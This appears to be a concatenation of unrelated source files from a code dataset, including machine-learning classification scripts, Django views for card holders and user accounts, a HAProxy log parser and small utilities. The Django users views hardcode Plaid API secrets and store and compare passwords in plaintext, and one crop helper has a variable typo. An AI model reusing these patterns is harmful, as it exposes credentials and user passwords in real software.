tabel_clasificare_err_test_bayes.to_csv(\"clasif_eronata_test_bayes.csv\")\r\n\r\n# Compute the confusion matrix and accuracy on the test set\r\nmat_conf_test_bayes = metrics.confusion_matrix(y, predictie_bayes)\r\nt_mat_conf_test_bayes = pd.DataFrame(mat_conf_test_bayes, regiuni,regiuni)\r\nt_mat_conf_test_bayes[\"Acuratete\"] = np.diagonal(mat_conf_test_bayes) * 100 / np.sum(mat_conf_test_bayes, axis=1)\r\nprint(t_mat_conf_test_bayes)\r\n#t_mat_conf_test_bayes.to_csv(\"mat_conf_test_bayes.csv\")\r\nacuratete_test_bayes = sum(np.diagonal(mat_conf_test_bayes)) * 100 / n\r\nprint(\"Overall accuracy of the Bayes model on the test set:\", sum(np.diagonal(mat_conf_test_bayes)) * 100 / n)\r\n\r\n\r\n# Build the SVM model\r\nmodel_svm = svm.SVC()\r\nmodel_svm.fit(x, y)\r\n\r\n# Classification on the training set\r\nclasificare_b_svm = model_svm.predict(x)\r\ntabel_clasificare_b_svm = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\": clasificare_b_svm\r\n    },index=nume_instante\r\n)\r\ntabel_clasificare_b_svm.to_csv(\"clasif_b_svm.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_svm = tabel_clasificare_b_svm[y != clasificare_b_svm]\r\n# tabel_clasificare_err_svm.to_csv(\"clasif_eronata_svm.csv\")\r\n\r\n# Compute the confusion matrix and accuracy on the training set\r\nmat_conf_svm = metrics.confusion_matrix(y, clasificare_b_svm)\r\nt_mat_conf_svm = pd.DataFrame(mat_conf_svm, regiuni, regiuni)\r\nt_mat_conf_svm[\"Acuratete\"] = np.diagonal(mat_conf_svm) * 100 / np.sum(mat_conf_svm, axis=1)\r\nprint(t_mat_conf_svm)\r\n#t_mat_conf_svm.to_csv(\"mat_conf_svm.csv\")\r\nacuratete_globala_svm = sum(np.diagonal(mat_conf_svm)) * 100 / n\r\nprint(\"Overall accuracy of the SVM model:\", sum(np.diagonal(mat_conf_svm)) * 100 / n)\r\n\r\n# Apply the model to the test set (2014 data)\r\npredictie_svm = model_svm.predict(x_testare)\r\nset_testare[\"Predictie_SVM\"] = predictie_svm\r\n\r\n# Classification on the test set\r\nclasificare_test_svm = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\" : predictie_svm\r\n    }, index=nume_instante\r\n)\r\nclasificare_test_svm.to_csv(\"clasif_test_svm.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_test_svm = clasificare_test_svm[y != predictie_svm]\r\n# tabel_clasificare_err_test_svm.to_csv(\"clasif_eronata_test_bayes.csv\")\r\n\r\n# Compute the confusion matrix and accuracy on the test set\r\nmat_conf_test_svm = metrics.confusion_matrix(y, predictie_svm)\r\nt_mat_conf_test_svm = pd.DataFrame(mat_conf_test_svm, regiuni, regiuni)\r\nt_mat_conf_test_svm[\"Acuratete\"] = np.diagonal(mat_conf_test_svm) * 100 / np.sum(mat_conf_test_svm, axis=1)\r\nprint(t_mat_conf_test_svm)\r\n#t_mat_conf_test_svm.to_csv(\"mat_conf_test_svm.csv\")\r\nacuratete_test_svm = sum(np.diagonal(mat_conf_test_svm)) * 100 / n\r\nprint(\"Overall accuracy of the SVM model on the test set:\", sum(np.diagonal(mat_conf_test_svm)) * 100 / n)\r\n\r\n\r\n# Build the decision tree model\r\nmodel_arbore = tree.DecisionTreeClassifier()\r\nmodel_arbore.fit(x, y)\r\n\r\n# Apply to the training set\r\nclasificare_b_arbore = model_arbore.predict(x)\r\ntabel_clasificare_b_arbore = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\" : clasificare_b_arbore\r\n    }, index=nume_instante\r\n)\r\ntabel_clasificare_b_arbore.to_csv(\"clasif_b_arbore.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_arbore = tabel_clasificare_b_arbore[y != clasificare_b_arbore]\r\n# tabel_clasificare_err_arbore.to_csv(\"clasif_eronata_arbore.csv\")\r\n\r\n# Compute the confusion matrix\r\nmat_conf_arbore = metrics.confusion_matrix(y, clasificare_b_arbore)\r\nt_mat_conf_arbore = pd.DataFrame(mat_conf_arbore, regiuni, regiuni)\r\nt_mat_conf_arbore[\"Acuratete\"] = np.diagonal(mat_conf_arbore) * 100 / np.sum(mat_conf_arbore, axis=1)\r\nprint(t_mat_conf_arbore)\r\n#t_mat_conf_arbore.to_csv(\"mat_conf_arbore.csv\")\r\nacuratete_globala_arbore = sum(np.diagonal(mat_conf_arbore)) * 100 / n\r\nprint(\"Overall accuracy of the tree model:\", sum(np.diagonal(mat_conf_arbore)) * 100 / n)\r\n\r\n# Apply the model to the test set (2014 data)\r\npredictie_arbore = model_arbore.predict(x_testare)\r\nset_testare[\"Predictie_arbore\"] = predictie_arbore\r\n\r\n# Classification on the test set\r\nclasificare_test_arbore = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\" : predictie_arbore\r\n    }, index=nume_instante\r\n)\r\nclasificare_test_arbore.to_csv(\"clasif_test_arbore.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_test_arbore = clasificare_test_arbore[y != predictie_arbore]\r\n# tabel_clasificare_err_test_arbore.to_csv(\"clasif_eronata_test_arbore.csv\")\r\n\r\n# Clasificare_b_arbore = model_arbore.predict(x)\r\nmat_conf_test_arbore = metrics.confusion_matrix(y, predictie_arbore)\r\nt_mat_conf_test_arbore = pd.DataFrame(mat_conf_test_arbore, regiuni, regiuni)\r\nt_mat_conf_test_arbore[\"Acuratete\"] = np.diagonal(mat_conf_test_arbore) * 100 / np.sum(mat_conf_test_arbore, axis=1)\r\nprint(t_mat_conf_test_arbore)\r\n#t_mat_conf_test_arbore.to_csv(\"mat_conf_test_arbore.csv\")\r\nacuratete_test_arbore = sum(np.diagonal(mat_conf_test_arbore)) * 100 / n\r\nprint(\"Overall accuracy of the tree model on the test set:\", sum(np.diagonal(mat_conf_test_arbore)) * 100 / n)\r\n\r\n# Save the results\r\nset_testare.to_csv(\"Predictie.csv\")\r\n\r\nacuratete_calculata = np.array([acuratete_test, acuratete_test_bayes, acuratete_test_svm, acuratete_test_arbore])\r\npredictii_set_testare = pd.Series(acuratete_calculata, index = ['LDA', 'Bayes', 'SVM', 'Arbore'])\r\n# predictii_grupate_test = predictii_set_testare.groupby(\"Acuratete\")\r\nprint(predictii_set_testare)\r\n\r\nacuratete_globala = [acuratete_globala, acuratete_globala_bayes, acuratete_globala_svm, acuratete_globala_arbore]\r\npredictii_set_invatare = pd.DataFrame(\r\n    data = {\r\n        \"Tipul Clasificarii Supervizate Set Invatare\": ['LDA', 'Bayes', 'SVM', 'Arbore'],\r\n        \"Acuratete\" : acuratete_globala\r\n    }\r\n)\r\npredictii_grupate = predictii_set_invatare.groupby(by=\"Acuratete\")\r\nprint(predictii_grupate.first())\r\n\r\ngrafice.show()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"430439425","text":"from django.contrib 
import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom shopper.models import DeviceHistory\nfrom shopper.models.card import Card\nfrom shopper.models.card_holder import CardHolder\nfrom shopper.models.device import DeviceStatus\nfrom shopper.models.device_history import DeviceActivity\nfrom shopper.views.forms.card_holder_form import CardHolderForm, CardAssignmentForm\n\n\ndef index(request):\n card_holders = CardHolder.objects.filter(company=request.user.get_profile().company)\n return render(request, 'card_holder/index.html', {'top_nav': 'admin',\n 'side_nav': 'list_card_holders',\n 'card_holders': card_holders})\n\n\ndef _show_new_card_holder_form(form, request, side_nav, action, button_text):\n return render(request, 'template.html', {'top_nav': 'admin',\n 'side_nav': side_nav,\n 'title': 'Card Holders',\n 'header': 'Create Card Holder',\n 'form': form,\n 'action': action,\n 'cancel_link': '/card_holder/list/',\n 'submit_button_text': button_text})\n\n\ndef view(request, card_holder_id):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n\n return render(request, 'card_holder/view.html', {'top_nav': 'admin',\n 'side_nav': 'list_card_holders',\n 'card_holder': card_holder})\n\n\ndef edit(request, card_holder_id):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n form = CardHolderForm(instance=card_holder)\n\n return _show_new_card_holder_form(form, request, \"list_card_holders\", \"/card_holder/{0}/update/\".format(card_holder_id), \"Update\")\n\n\ndef update(request, card_holder_id):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n form = CardHolderForm(data=request.POST, instance=card_holder)\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.INFO, \"Card holder details updated successfully\")\n return HttpResponseRedirect('/card_holder/list/')\n\n messages.add_message(request, messages.ERROR, \"Error occurred while changing card holder details\")\n return _show_new_card_holder_form(form, request)\n\n\ndef change_status(request, card_holder_id, status):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n card_holder.status = status\n card_holder.save()\n messages.add_message(request, messages.INFO, \"Card holder status changed successfully\")\n return HttpResponseRedirect('/card_holder/list/')\n\n\ndef test(request):\n return render(request, \"test.html\", {})\n\n\ndef new(request):\n form = CardHolderForm()\n\n return _show_new_card_holder_form(form, request, \"add_card_holders\", \"/card_holder/create/\", \"Add\")\n\n\ndef create(request):\n form = CardHolderForm(data=request.POST)\n if form.is_valid():\n card_holder = form.save(commit=False)\n card_holder.company = request.user.get_profile().company\n card_holder.save()\n\n messages.add_message(request, messages.INFO, \"{0} cardholder create successfully\".format(card_holder.full_name()))\n return HttpResponseRedirect('/card_holder/list/')\n\n messages.add_message(request, messages.ERROR, \"Error occurred while adding new card holder\")\n return _show_new_card_holder_form(form, request, \"add_card_holders\", \"/card_holder/create/\", \"Add\")\n\n\ndef _render_assignment_form(form, request):\n return render(request, 'template.html', {'top_nav': 'admin',\n 'side_nav': 'list_card_holders',\n 'title': 'Card Holders',\n 'header': 'Assign Card to Card Holder',\n 'form': form,\n 'action': '/card_holder/assign_card/',\n 'submit_button_text': \"Assign Card\",\n 'cancel_link': '/card_holder/list/'})\n\n\ndef assignment(request):\n 
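# (Editor's note) request.user.get_profile(), used throughout the views above, was
# deprecated in Django 1.5 and removed in Django 1.7. With a OneToOneField from a
# profile model to User, the modern spelling is plain attribute access; a sketch
# (the related_name "profile" is an assumption, not from this codebase):
def current_company(request):
    return request.user.profile.company  # replaces request.user.get_profile().company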
form = CardAssignmentForm(initial=request.GET)\n return _render_assignment_form(form, request)\n\n\ndef assign_card(request):\n form = CardAssignmentForm(data=request.POST, user=request.user)\n if form.is_valid():\n card = Card.objects.get(company=request.user.get_profile().company, serial_number=request.POST[\"card_serial_number\"])\n card_holder = CardHolder.objects.get(telephone=request.POST[\"card_holder_telephone\"])\n\n if card_holder.card:\n history = DeviceHistory()\n history.user = request.user\n history.activity = DeviceActivity.UNASSIGNED.format(card_holder.description())\n history.save()\n\n card_holder.card.activities.add(history)\n card_holder.card.save()\n\n card_holder.card = card\n card_holder.save()\n\n history = DeviceHistory()\n history.user = request.user\n history.activity = DeviceActivity.ASSIGNED.format(card_holder.description())\n history.save()\n\n card.activities.add(history)\n card.status = DeviceStatus.ACTIVE\n card.save()\n\n messages.add_message(request, messages.INFO, \"Card {0} assigned to {1} successfully\".format(card.serial_number, card_holder.full_name()))\n return HttpResponseRedirect('/card_holder/{0}/view'.format(card_holder.id))\n\n messages.add_message(request, messages.ERROR, \"Error occurred while assigning card to card holder\")\n return _render_assignment_form(form, request)","sub_path":"console/shopper/views/card_holder_views.py","file_name":"card_holder_views.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182022738","text":"import numpy as np\nimport math\nimport scipy.misc as imLib\n\ndef crop(img, center, scale, res):\n oriWd, oriHt, oriChan = img.shape\n \n ''' new image range in original img coordinate '''\n tmpSize = scale *200\n newUl = [math.floor(center[0] - tmpSize/2), math.floor(center[1] - tmpSize/2)]\n newBr = [math.floor(center[0] + tmpSize/2), math.floor(center[1] + tmpSize/2)]\n \n ''' original image range in new img coordinate '''\n oriUl = np.multiply(newUl, -1)\n oriBr = [oriWd - newBr[0] + tmpSize, oriHt - newBr[1] + tmpSize]\n\n '''\n print('before:')\n print('original coordinate:')\n print('upper left x = ' + str(ul[0]) + ' upper left y = ' + str(ul[1]))\n print('bottom right x = ' + str(br[0]) + ' bottom right y = ' + str(br[1]))\n print('new coordinate:')\n print('upper left x = ' + str(loc_ul[0]) + ' upper left y = ' + str(loc_ul[1]))\n print('bottom right x = ' + str(loc_br[0]) + ' bottom right y = ' + str(loc_br[1]))\n '''\n \n ''' generate black new image '''\n newDim = [newBr[0] - newUl[0], newBr[1] - newUl[1], img.shape[2]]\n newImg = np.zeros(newDim)\n \n ''' crop area of new image beging filled if exceed orignal image range '''\n if oriUl[0] < 0:\n oirUl[0] = 0\n \n if oriUl[1] < 0:\n oriUl[1] = 0\n \n if oriBr[0] > newDim[0]:\n oriBr[0] = newDim[0]\n \n if oriBr[1] > newDim[1]:\n oriBr[1] = newDim[1]\n \n ''' crop area of original image to fill in if exceed new image range '''\n if newUl[0] < 0:\n newUl[0] = 0\n \n if newUl[1] < 0:\n newUl[1] = 0\n \n if newBr[0] > oriWd:\n newBr[0] = oriWd\n \n if newBr[1] > oriHt:\n newBr[1] = oriHt\n \n ''' \n print('after:')\n print('original coordinate:')\n print('upper left x = ' + str(ul[0]) + ' upper left y = ' + str(ul[1]))\n print('bottom right x = ' + str(br[0]) + ' bottom right y = ' + str(br[1]))\n print('new coordinate:')\n print('upper left x = ' + str(loc_ul[0]) + ' upper left y = ' + str(loc_ul[1]))\n print('bottom right x = ' + str(loc_br[0]) + ' bottom right 
y = ' + str(loc_br[1]))\n '''\n \n newImg[oriUl[0] : oriBr[0], oriUl[1] : oriBr[1]] = img[newUl[0] : newBr[0],\n newUl[1] : newBr[1]]\n newImg = imLib.imresize(newImg, (res, res, 3))\n \n return newImg\n","sub_path":"imgCrop.py","file_name":"imgCrop.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533873774","text":"\n\n#calss header\nclass _PROVIDE():\n\tdef __init__(self,): \n\t\tself.name = \"PROVIDE\"\n\t\tself.definitions = [u'to give someone something that they need: ', u'(of a law or decision) to say that something must happen if particular conditions exist: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_provide.py","file_name":"_provide.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109933485","text":"#!/usr/bin/python3\n# gamelibraryproject.py\n# KJ Klamer\n# 1/28/2020\nimport pickle\n\ngames = {1:[\"FPS\",\"Halo 3\",\"Bungie\",\"Microsoft\",\"Xbox 360\",\"2007\",\n \"6.0\",\"Both\",\"30.00\",\"Yes\",\"1/15/2008\",\"This Game Blows Chunks\"]}\n\"\"\"2:[\"Action-Adventure\",\"Just Cause 4\",\"Avalanche Studios\",\"Square Enix\",\n\"PlayStation 4, Xbox One, Microsoft Windows\",\"2018\", \"6.0\",\"Singleplayer\",\n\"Yes\",\"40.00\"],\n3:[]}\"\"\"\ndata_file = open(\"game_lib.pickle\",\"wb\")\npickle.dump(games, data_file)\ndata_file.close()\n\nopen_pickle = open(\"game_lib.pickle\",\"rb\")\nshow_pickle = pickle.load(open_pickle)\nopen_pickle.close()\n\nprint(show_pickle)","sub_path":"gamelist.py","file_name":"gamelist.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469985661","text":"\"\"\"empty message\n\nRevision ID: 2fd0ab60fe3a\nRevises: 29012e868555\nCreate Date: 2019-02-22 13:39:39.314912\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '2fd0ab60fe3a'\ndown_revision = '29012e868555'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('stardrive_user', 'role')\n # ### end Alembic commands ###\n role = postgresql.ENUM('admin', 'user', name='role')\n role.create(op.get_bind())\n op.add_column('stardrive_user', sa.Column('role', sa.Enum('admin', 'user', name='role'), nullable=True))\n\n\ndef downgrade():\n op.drop_column('stardrive_user', 'role')\n op.execute(\"DROP TYPE role;\")\n # ### commands auto generated by Alembic - please adjust! 
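# (Editor's note) Two fixes are worth flagging in the crop() snippet above: the
# first clamp assigns to "oirUl[0]" where "oriUl[0]" is clearly meant, and
# scipy.misc.imresize was removed in SciPy 1.3, so Pillow (or skimage) is the usual
# replacement today. A minimal sketch of the clamp-and-resize with np.clip
# (function and argument names are illustrative):
import numpy as np
from PIL import Image

def clamp_box(ul, br, height, width):
    """Clip a [row, col] window to the valid image bounds."""
    ul = np.clip(ul, 0, [height, width])
    br = np.clip(br, 0, [height, width])
    return ul, br

def resize_square(img, res):
    return np.asarray(Image.fromarray(img.astype(np.uint8)).resize((res, res)))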
###\n op.add_column('stardrive_user', sa.Column('role', sa.VARCHAR(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","sub_path":"backend/migrations/versions/2fd0ab60fe3a_.py","file_name":"2fd0ab60fe3a_.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361785560","text":"from django.http import HttpResponse\nfrom .models import Users\nfrom django.template import loader\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views import generic\nfrom django.http import Http404\nimport requests\nimport json\n\ndef index(request):\n\tall_users = Users.objects.all()\n\ttemplate = loader.get_template('users/index.html')\n\tcontext = {\n\t\tall_users : 'all_users',\n\t}\n\treturn HttpResponse(template.render(context, request))\n\ndef login(request):\n\ttemplate = loader.get_template('users/login.html')\n\tlogin_message = 'Enter your credentials to login into the system'\n\tcontext = {\n\t\t'login_message': login_message,\n\t}\n\treturn HttpResponse(template.render(context, request))\n\ndef account_profile(request, user_id):\n\n\treturn HttpResponse(\"
User profile for user: \" + str(user_id) + \"\" )\n\ndef logout(request):\n\treturn HttpResponse(\"You are logged out
    \")\n\ndef getTransactionData(access_tkn):\n\turl = \"https://sandbox.plaid.com/transactions/get\"\n\n\tpayload = {\n\t\t\"client_id\":\"5da9e9d3470e370016651aa3\",\n\t\t\"secret\":\"1026c23bcd23fccd4f9dabb1f9f172\",\n\t\t\"access_token\": access_tkn,\n\t\t\"start_date\":\"2017-10-25\",\n\t\t\"end_date\":\"2019-10-25\"\n\t}\n\n\tdata = json.dumps(payload)\n\n\theaders = {\n 'Content-Type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"bec1a651-a9e8-4771-9b6e-bf668f000232\"\n }\n\n\trawResponse = requests.request(\"POST\", url, data=data, headers=headers)\n\tresponse = json.loads(rawResponse.text)\n\tprettyResponse = json.dumps(response, indent=4, sort_keys=True)\n\n\treturn prettyResponse\n\ndef getAccountData(access_tkn):\n\trawTransactionData = getTransactionData(access_tkn)\n\ttransactionData = json.loads(rawTransactionData)\n\taccountData = transactionData['accounts']\n\tprint(accountData)\n\treturn accountData\n\ndef validate(request):\n\ttemplate = loader.get_template('users/login.html')\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\tprint(username)\n\tprint(password)\n\ttry:\n\t\tuser = Users.objects.get(username=username, password=password)\n\t\tprint(\"is valid\",user.is_logged_in)\n\t\tuser.is_logged_in = True\n\t\tuser.save()\n\n\t\tlogin_message = \"Sucessfully logged in\"\n\n\t\taccess_tkn = user.access_tkn\n\n\t\trequest.session['access_tkn']=access_tkn\n\t\tcontext = {\n\t\t\t'user': user,\n\t\t\t'login_message': login_message\n\t\t}\n\n\t\ttemplate = loader.get_template('users/account_profile.html')\n\texcept:\n\t\tlogin_message = \"Incorrect Credentials. Please Try Again....\"\t\t\n\t\tcontext = {\n\t\t\t'user': None,\n\t\t\t'login_message': login_message\n\t\t}\n\t\treturn HttpResponse(template.render(context,request))\n\n\tusername=None\n\tpassword=None\n\taccess_tkn=None\n\ttransactionData=None\n\treturn HttpResponse(template.render(context, request))\n\n\ndef invalidate(request):\n\trequest.session['access_tkn'] = None\n\ttemplate = loader.get_template('users/login.html')\n\tuser_id = request.POST['user_id']\n\tcontext = {}\n\ttry:\n\t\tuser = Users.objects.get(pk=user_id)\n\t\tuser.is_logged_in =False\n\t\tuser.save()\n\texcept:\n\t\tprint('')\n\tuser_id = None\n\treturn HttpResponse(template.render(context, request))\n\ndef signup(request):\n\ttemplate = loader.get_template('users/signup.html')\n\tcontext = {}\n\treturn HttpResponse(template.render(context, request))\n\ndef getPublicToken():\n\turl = \"https://sandbox.plaid.com/sandbox/public_token/create\"\n\tpayload = {\n\t\t\"public_key\":\"91e20631f435dd6896adf30031b81c\",\n\t\t\"institution_id\":\"ins_3\",\n\t\t\"initial_products\":[\"transactions\"],\n\t\t\"options\":{\n\t\t\t\"webhook\":\"https://webhook.site/82e5cebe-b8d0-4178-ac51-bb3699d782ac\"\n\t\t}\n\t}\n\tdata = json.dumps(payload)\n\theaders = {\n\t 'Content-Type': \"application/json\",\n\t 'cache-control': \"no-cache\",\n\t 'Postman-Token': \"02fad5e9-5a06-4d80-b35e-db22559238e9\"\n\t }\n\trawResponse = requests.request(\"POST\", url, data=data, headers=headers)\n\tresponse = json.loads(rawResponse.text)\n\tpublic_token = response['public_token']\n\treturn public_token\n\ndef exchangeToken(public_token):\n\turl = \"https://sandbox.plaid.com/item/public_token/exchange\"\n\n\tpayload = {\n\t\t\"client_id\":\"5da9e9d3470e370016651aa3\",\n\t\t\"secret\":\"1026c23bcd23fccd4f9dabb1f9f172\",\n\t\t\"public_token\":public_token\n\t}\n\n\tdata = json.dumps(payload)\n\n\theaders = {\n\t 
'Content-Type': \"application/json\",\n\t 'cache-control': \"no-cache\",\n\t 'Postman-Token': \"278806c6-0301-49d7-933d-f3c7b295e6a4\"\n\t}\n\n\trawResponse = requests.request(\"POST\", url, data=data, headers=headers)\n\tresponse = json.loads(rawResponse.text)\n\taccess_tkn = response['access_token']\n\titem_id = response['item_id']\n\n\treturn access_tkn,item_id\n\ndef register(request):\n\tall_users = Users.objects.all()\n\ttemplate = loader.get_template('users/login.html')\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\temail = request.POST['email_id']\n\n\tpublic_token = getPublicToken()\n\tprint(\"Successfully Generated Public Token for user \",username,\" \",public_token)\n\taccess_tkn,item_id = exchangeToken(public_token)\n\n\tuser = Users.objects.create(username=username,password=password,email=email,access_tkn=access_tkn,item_id=item_id)\n\tuser.save()\n\n\tcontext = {\n\t\tall_users : 'all_users',\n\t}\n\treturn HttpResponse(template.render(context, request))\n\ndef getTransactions(request):\n\ttemplate = loader.get_template('users/account_profile.html')\n\tuser_id = request.POST['user_id']\n\taccess_tkn = request.session['access_tkn']\n\tcontext = dict()\n\tif access_tkn:\n\t\ttry:\n\t\t\tuser = Users.objects.get(pk=user_id)\n\t\t\ttransactionData = getTransactionData(access_tkn)\n\t\t\tcontext = {\t\n\t\t\t\t'user':user,\n\t\t\t\t'transactionData':transactionData,\n\t\t\t\t'response_message':'Successfully Reloaded Transaction Data'\n\t\t\t} \n\t\texcept:\n\t\t\ttemplate = loader.get_template('users/login.html')\n\t\t\n\t\n\telse:\n\t\ttemplate = loader.get_template('users/login.html')\n\t\n\treturn HttpResponse(template.render(context, request))\n\ndef getAccounts(request):\n\ttemplate = loader.get_template('users/account_profile.html')\n\tuser_id = request.POST['user_id']\n\taccess_tkn = request.session['access_tkn']\n\tcontext = dict()\n\ttry:\n\t\tuser = Users.objects.get(pk=user_id)\n\t\taccountData = getAccountData(access_tkn)\n\t\tcontext = {\t\n\t\t\t'user':user,\n\t\t\t'accountData':accountData,\n\t\t\t'response_message':'Successfully Reloaded Account Data'\n\t\t} \n\texcept:\n\t\tprint(\"Redirecting\")\n\t\ttemplate = loader.get_template('users/login.html')\n\t\n\treturn HttpResponse(template.render(context, request))","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"362826347","text":"#!/usr/local/bin/python\n\n#\n# Copyright 2020, Fernando Lemes da Silva\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport time\nimport re\nfrom os import listdir, remove\nfrom os.path import isfile, join\nfrom pymongo import MongoClient\n\nhaproxy_log_format = re.compile(r\"^.* ([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+) ([0-9]+) ([0-9]+) [^ ]+ [^ ]+ [^ ]+ ([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+)/([0-9]+) ([0-9]+)/([0-9]+) \\\"([A-Z]+) ([^ ]+) ([^ ]+)\\\".*$\")\n\nmongo_client = 
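# (Editor's note) The Plaid helpers above hard-code the sandbox client_id and secret
# in source; moving them to environment variables keeps the flow identical. A sketch
# of the same public_token -> access_token exchange (endpoint and payload shape are
# taken from the snippet above; the env-var names are assumptions):
import json
import os
import requests

def exchange_token(public_token):
    payload = {
        "client_id": os.environ["PLAID_CLIENT_ID"],
        "secret": os.environ["PLAID_SECRET"],
        "public_token": public_token,
    }
    resp = requests.post("https://sandbox.plaid.com/item/public_token/exchange",
                         data=json.dumps(payload),
                         headers={"Content-Type": "application/json"})
    body = resp.json()
    return body["access_token"], body["item_id"]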
MongoClient('mongodb://mongodb:27017/')\nmongo_database = mongo_client.monitoring\nmongo_collection = mongo_database.log_records\n\ndef add_haproxy_entry_to_db(data):\n log_entry = {\n \"time_to_receive_request\": data[0],\n \"time_in_queue\": data[1],\n \"time_to_tcp_connect\": data[2],\n \"time_to_get_response\": data[3],\n \"total_time_active\": data[4],\n \"http_status\": data[5],\n \"bytes_count\": data[6],\n \"concurrent_connections_haproxy\": data[7],\n \"concurrent_connections_frontend\": data[8],\n \"concurrent_connections_backend\": data[9],\n \"concurrent_active_connections_on_server\": data[10],\n \"connection_retry_attempts\": data[11],\n \"queue1\": data[12],\n \"queue2\": data[13],\n \"http_verb\": data[14],\n \"http_path\": data[15],\n \"http_protocol\": data[16]\n }\n mongo_collection.insert_one(log_entry)\n\ndef process_file_line(line):\n search = haproxy_log_format.search(line)\n if search:\n add_haproxy_entry_to_db(search.groups())\n\nlog_path = \"/logs/\"\n\nwhile True:\n file_list = [join(log_path, each_dir_entry) for each_dir_entry in listdir(log_path) if isfile(join(log_path, each_dir_entry))]\n for each_file in file_list:\n print(\"Processing file: \" + each_file)\n lines_processed = 0\n file_handler = open(each_file, \"r\")\n for each_line in file_handler:\n process_file_line(each_line)\n lines_processed += 1\n file_handler.close()\n print(\"Processed \" + str(lines_processed) + \" lines from file: \" + each_file)\n remove(each_file)\n time.sleep(5)\n","sub_path":"log-reader/readlogs.py","file_name":"readlogs.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650597452","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.shortcuts import render,redirect,render_to_response\nfrom django.contrib.auth import authenticate, login\nfrom .forms import LoginForm,UserRegistrationForm,UserEditForm, ProfileEditForm,UserFeatureEditForm\nfrom .models import Profile\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.contrib.auth import REDIRECT_FIELD_NAME\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib import messages\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.views.generic import DeleteView, TemplateView\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.decorators import login_required\nfrom search.models import userfeature,hobbies,movie,music\nfrom dating.helper import getgender,geteducation,getlocation,getonlychild\n\n# DEFAULT_RETURNTO_PATH = getattr(settings, 'DEFAULT_RETURNTO_PATH', '/')\n\n\n\ndef user_login(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'],\n password=cd['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponse('Authenticated successfully')\n else:\n return HttpResponse('Disabled account')\n else:\n return HttpResponse('Invalid login')\n else:\n form = LoginForm()\n return render(request, 'login.html', {'form': form})\n\n\n\n@login_required\ndef dashboard(request):\n return render(request, 'account/dashboard.html', {'section': 'dashboard'})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = 
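# (Editor's note) readlogs.py above maps 17 positional regex groups into a Mongo
# document one key at a time; since the regex yields the groups in field order, a
# single zip keeps the names next to the pattern (field names copied from the
# snippet, helper name illustrative):
HAPROXY_FIELDS = (
    "time_to_receive_request", "time_in_queue", "time_to_tcp_connect",
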